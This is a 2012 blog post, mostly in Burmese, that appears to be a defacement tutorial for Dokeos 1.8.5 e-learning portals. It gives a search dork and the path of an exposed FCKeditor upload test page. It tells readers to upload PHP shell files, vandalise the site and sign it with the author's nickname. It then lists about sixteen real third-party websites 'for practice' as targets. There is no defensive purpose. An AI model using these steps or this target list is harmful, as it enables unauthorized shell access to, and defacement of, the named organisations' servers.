Website တည္းကို ၀င္ဖုိ ့ username ေတြ password ေတြမလုိအပ္ေတာ့ပါဘူး...
ကဲစလုိက္ရေအာင္ဗ်ာ...
dork : "Portail Dokeos 1.8.5"
exploit :http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Goto : http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html chnage
ျပီးရင္ အဲ့မွာတင္လုိ ့ရမယ့္ဖုိင္ေတြက html .php .jpg .txt ေတြေပ့ါဗ်ာ.. shell ဖုိင္ေတြတင္ျပီးေတာ့လည္း စိတ္ၾကိုက္ ေမႊလုိ ့ရပါတယ္...
ေမႊျပီးရင္ သင့္နမည္ကိုလည္းေျပာင္းလုိက္ဗ်ာ.. အေမႊေတာ္လို ့ .... ကြ်န္ေတာ့္ေဘာ္ဒါေတြကေတာ့ ကြ်န္ေတာ့္ကို အေမႊေတာ္လုိ ့ေခၚၾကတယ္.. သင္လညး္ဒီနမည္ကို ယူလုိက္ဗ်ာ...
ကဲကဲ ဆက္ၾကအုံးမယ္..
သင့္ဖုိင္ upload တင္ျပီးသြားျပီဆုိရင္ေတာ့
http://website/patch/main/upload/your file here
ဆုိျပီးသြားၾကည့္ေပ့ါ...
Other websites For practice
http://campus.flone.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://ns5.freeheberg.com/~dispensa/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.dokeos.nrc-gauthey.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.ladapt-hn.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://my.eurasiam.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://el.technifutur.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.formation.megalodon.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.pharmconseil-elearning.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://pro.accru.info/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.formation-microkine.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://foad.ina.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://campus.technifutur.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.fpafoad22.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.ecoleprimaireenligne.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://campus.flone.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.elearning80.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Friday, May 18, 2012
"Portail Dokeos" deface and Shell Upload vulnerability
Subscribe to:
Post Comments (Atom)





0 comments:
Post a Comment